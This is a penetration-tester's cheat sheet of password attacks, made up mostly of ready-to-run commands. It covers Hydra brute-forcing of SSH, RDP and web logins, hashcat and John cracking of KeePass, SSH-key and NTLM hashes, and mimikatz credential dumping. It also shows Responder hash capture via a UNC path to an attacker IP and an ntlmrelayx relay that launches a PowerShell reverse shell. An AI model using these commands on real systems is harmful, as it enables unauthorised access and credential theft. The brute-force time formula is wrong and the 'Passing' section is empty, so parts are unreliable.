Username / Password attacks

Identify the hash

You can identify the hash with tools such as:

hash-identifier
hashid <hash>

Get hash type

hashcat --help | grep -i "<INPUT>"

Password list generation

If you have part of password you can generate it's variations using crunch.

You have to specify minimum length, maximum length and pattern.

% = additional generated letter

crunch 6 6 -t <any_word>%%% > wordlist

Regular Brute-Force

You can calculate time needed for cracking the hash using the following method:

1. Count the total number of possible characters.

2. Multiple the count from step 1 with password length.

3. Divide the result by the number of MD5 GPUs, and then by 60 to find how many minutes it will take. (use hashcat -b to benchmark)

After choosing the wordlist we can move on to the Hydra tool which will help us in performing the attack.

SSH

Password Brute Force:

hydra -l <USERNAME> -P wordlist <IP> -t 4 ssh -V

RDP

Username Brute-Force:

hydra -L /usr/share/wordlists/dirb/others/names.txt -p "<PASSWORD>" rdp://<IP>

HTTP

FAILED_LOGIN_IDENTYFIER is text which shows up on page only when login failed.

Password Brute-Force [POST]:

hydra -l user -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/index.php:<USERNAME_PARAM>=user&<PWD_PARAM>=^PASS^:<FAILED_LOGIN_IDENTYFIER>"

Password Managers

Search for password managers in windows apps. Once you will identify password manager on the system search for password's manager database file.

KeePass example:

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Also look for configuration files:

Get-ChildItem -Path C:\<APP_PATH> -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Transforming the hash into a format our cracking tool can use

keepass2john <file>.kdbx > <file>.hash

Since KeePass uses a master password without any kind of username, we need to remove the "Database:" string with a text editor.

Then we can run hashcat

hashcat -m 13400 <file>.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

SSH Private Key

You can bruteforce private keys for ssh using John the Ripper.

Create rule:

[List.Rules:sshRules]
c $1 $3 $7 $! # replace
c $1 $3 $7 $@ # replace
c $1 $3 $7 $# # replace

Add rule to john config:

sudo sh -c 'cat <RULE_FILE> >> /etc/john/john.conf'

Transform id_rsa into hash

ssh2john id_rsa > ssh.hash

Attack:

john --wordlist=<PASSWORDS_FILE> --rules=<RULE_NAME> ssh.hash

Rule based attack (Hashcat)

You can find the rules on the Hashcat Wiki: https://hashcat.net/wiki/doku.php?id=rule_based_attack

Add rule to the file with rules:

echo [rule] > <RULE_FILE>

Show attack preview in hashcat debug mode:

hashcat -r <RULE_FILE> --stdout <PASSWORD_LIST>

After debug hashcat can be run:

Hashcat mode id: https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat -r <rule> -m <id> <hashfile> <wordlist>

NTLM

You can calculate NTLM form user's password: https://www.browserling.com/tools/ntlm-hash

You can dump the NTLM hashes using mimikatz as Administrator when you have SeDebugPrivilege access enabled:

We can also become the SYSTEM with SeImpersonatePrivilege access in order to get access to the hashes.

First we check for SeDebugPrivilege:

privilege::debug

We are able to elevate with the following command:

token::elevate

We can extract passwords using the following:

sekurlsa::logonpasswords

lsadump::sam

Cracking

hashcat -m 1000 ntlm.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Passing

Scan with NetExec / SMBExec [Pass the hash]:

Connecting to the server [Connection]:

Useful commands

NTLMv2

You can get NTLMv2 hashes with responder when the target server reaches to us:

sudo responder -I <NETWORK_CARD>

Grab it with this command:

dir \\<ATTACKER_IP>\test

Or using file upload:

//<IP>/share/nonexistent.txt

\\\\<IP>\\share\\nonexistent.txt

Cracking

hashcat -m 5600 <HASH_FILE> <WORDLIST> --force # for wordlist you can use: /usr/share/wordlists/rockyou.txt

Relaying

impacket-ntlmrelayx --no-http-server -smb2support -t <IP> -c "powershell -enc <BASE64_REVERSE_SHELL>"

MD5

Also use https://crackstation.net.

hashcat -m 0 <HASH_FILE> <WORDLIST> --force # for wordlist you can use: /usr/share/wordlists/rockyou.txt